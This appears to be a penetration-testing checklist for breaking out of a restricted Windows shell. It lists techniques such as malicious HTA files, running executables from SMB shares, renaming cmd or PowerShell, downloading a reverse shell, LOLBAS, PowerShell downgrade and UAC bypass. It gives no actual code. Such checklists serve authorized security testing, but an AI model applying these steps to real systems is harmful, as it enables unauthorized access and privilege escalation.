Gained access to a lockdown host and need to find way to escape the restrict shell?
Methodology
Gaining shell access
- Check what software's you can access
- Try common such as cmd, powershell, powershell_ise, ftp and etc
- Try to use alternatives to powershell and cmd such as PowerShdll and
- Try explorer bar commands
- Check if you can access internet explorer, paint, excel, file explorer and etc
- Check keyboard shortcuts
- Try to create a new file (Use the malicious HTA file) or a new shortcut and point it to a executable
- Load files via a SMB share and execute them
- Windows 10 - try Cortana exploit
- Try and to copy powershell.exe or cmd.exe and change it to a different name and then run it
- Try and access \127.0.0.1\c$
Once a shell was obtained
- Bypassing powershell restrictions
- If it's powershell try and download reverse shell and run it, if it's version 4 check if you can downgrade to powershell v2
- Try to use Powershell alternatives (nps, powershelld and etc)
- Test if you can execute commands via LOLBAS
- Attempt UAC Bypass to gain administrative privileges
Table of Content:
Applocker
powershell constrained language bypass
Alternatives to command prompt